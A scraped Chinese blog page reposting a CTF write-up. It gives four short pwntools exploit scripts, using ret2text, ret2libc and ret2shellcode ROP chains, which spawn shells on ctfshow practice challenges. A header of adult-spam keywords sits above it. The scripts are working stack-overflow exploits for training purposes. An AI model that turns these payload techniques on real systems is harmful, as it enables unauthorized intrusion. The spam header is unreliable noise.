日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-CTFSHOW-8

發布時間:2023/12/10 编程问答 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PWN-PRACTICE-CTFSHOW-8 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

PWN-PRACTICE-CTFSHOW-8

    • 吃瓜杯-wuqian
    • 月餅杯II-簡單的胖
    • 月餅杯II-容易的胖
    • 擊劍杯-pwn01-My_sword_is_ready

吃瓜杯-wuqian

棧溢出,ret2text

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28059) elf=ELF("./pwn1")system=elf.plt["system"] binsh=0x601040 pop_rdi=0x400663 ret=0x400476io.recvuntil("your name? ") payload="a"*16+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system) io.sendline(payload)io.interactive()

月餅杯II-簡單的胖

棧溢出,ret2libc

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28091) elf=ELF("./pwn1")printf_got=elf.got["printf"] printf_plt=elf.plt["printf"] pop_rdi=0x400703 pop_rsi_r15=0x400701 ret=0x4004ce my_format=0x400740 start_addr=0x400510io.recvuntil("your name? ") payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(my_format)+p64(pop_rsi_r15)+p64(printf_got)+p64(0)+p64(printf_plt)+p64(start_addr) io.sendline(payload) printf_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("printf_addr=="+hex(printf_addr)) libc_base=printf_addr-0x064e80 system=libc_base+0x04f440 binsh=libc_base+0x1b3e9aio.recvuntil("your name? ") payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system) io.sendline(payload)io.interactive()

月餅杯II-容易的胖

棧溢出,ret2shellcode

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" context.arch="i386" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28076) elf=ELF("./pwn1")buf=0x0804A040 io.recvuntil("Input your shellcode\n") payload=p32(buf+4) payload+=asm(shellcraft.sh()) io.sendline(payload)io.recvuntil("use shellcode????\n") payload="yes\n".ljust(0x10,"\x00")+p32(buf+4) io.send(payload)io.interactive()

擊劍杯-pwn01-My_sword_is_ready

棧溢出,覆蓋棧上數據,使result==666,即可執行后門函數

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28003) elf=ELF("./pwn1")io.recvuntil("with bit!\n") payload="a"*36+p32(222)*3 io.send(payload)io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-8的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。